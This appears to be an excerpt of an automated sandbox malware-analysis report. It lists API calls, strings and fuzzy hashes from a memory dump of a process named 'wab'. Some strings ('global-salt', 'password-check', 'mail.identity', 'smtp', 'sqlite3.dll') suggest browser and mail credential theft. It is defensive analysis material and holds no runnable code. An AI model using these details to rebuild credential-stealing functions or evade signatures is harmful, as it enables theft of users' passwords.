                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                    • String ID:
                                    • API String ID: 3974772901-0
                                    • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                    • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                    • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                    • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                    APIs
                                    • wcslen.MSVCRT ref: 0044406C
                                    • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                    • strlen.MSVCRT ref: 004440D1
                                      • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                                      • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                    • memcpy.MSVCRT ref: 004440EB
                                    • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                    • String ID:
                                    • API String ID: 577244452-0
                                    • Opcode ID: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                    • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                    • Opcode Fuzzy Hash: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                    • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                    APIs
                                    • memset.MSVCRT ref: 0040C02D
                                      • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                      • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                      • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                      • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                      • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                      • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                      • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
                                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                      • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
                                      • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                    • API String ID: 2726666094-3614832568
                                    • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                    • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                    • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                    • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                    APIs
                                    • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                    • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                    • OpenClipboard.USER32(?), ref: 0040C1B1
                                    • GetLastError.KERNEL32 ref: 0040C1CA
                                    • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                    • String ID:
                                    • API String ID: 2014771361-0
                                    • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                    • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                    • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                    • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                    APIs
                                    • memcmp.MSVCRT ref: 00406151
                                      • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                                      • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
                                      • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
                                    • memcmp.MSVCRT ref: 0040617C
                                    • memcmp.MSVCRT ref: 004061A4
                                    • memcpy.MSVCRT ref: 004061C1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcmp$memcpy
                                    • String ID: global-salt$password-check
                                    • API String ID: 231171946-3927197501
                                    • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                    • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                    • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                    • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                    APIs
                                    • GetParent.USER32(?), ref: 004090C2
                                    • GetWindowRect.USER32(?,?), ref: 004090CF
                                    • GetClientRect.USER32(00000000,?), ref: 004090DA
                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Window$Rect$ClientParentPoints
                                    • String ID:
                                    • API String ID: 4247780290-0
                                    • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                    • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                    • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                    • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: _strcmpi$_mbscpy
                                    • String ID: smtp
                                    • API String ID: 2625860049-60245459
                                    • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                    • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                    • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                    • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                    APIs
                                      • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                      • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                    • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                    • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                    • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                    • String ID: MS Sans Serif
                                    • API String ID: 3492281209-168460110
                                    • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                    • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                    • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                    • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ClassName_strcmpimemset
                                    • String ID: edit
                                    • API String ID: 275601554-2167791130
                                    • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                    • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                    • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                    • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: _strcmpi
                                    • String ID: C@$mail.identity
                                    • API String ID: 1439213657-721921413
                                    • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                    • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                    • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                    • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: _ultoasprintf
                                    • String ID: %s %s %s
                                    • API String ID: 432394123-3850900253
                                    • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                    • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                    • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                    • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                    APIs
                                    • LoadMenuA.USER32(00000000), ref: 00409078
                                    • sprintf.MSVCRT ref: 0040909B
                                      • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                      • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                      • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                      • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                      • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                    • String ID: menu_%d
                                    • API String ID: 1129539653-2417748251
                                    • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                    • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                    • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                    • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                    APIs
                                    • _mbscpy.MSVCRT ref: 004070EB
                                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                    • _mbscat.MSVCRT ref: 004070FA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: _mbscat$_mbscpystrlen
                                    • String ID: sqlite3.dll
                                    • API String ID: 1983510840-1155512374
                                    • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                    • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                    • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                    • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcpy
                                    • String ID:
                                    • API String ID: 3510742995-0
                                    • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                    • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                    • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                    • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8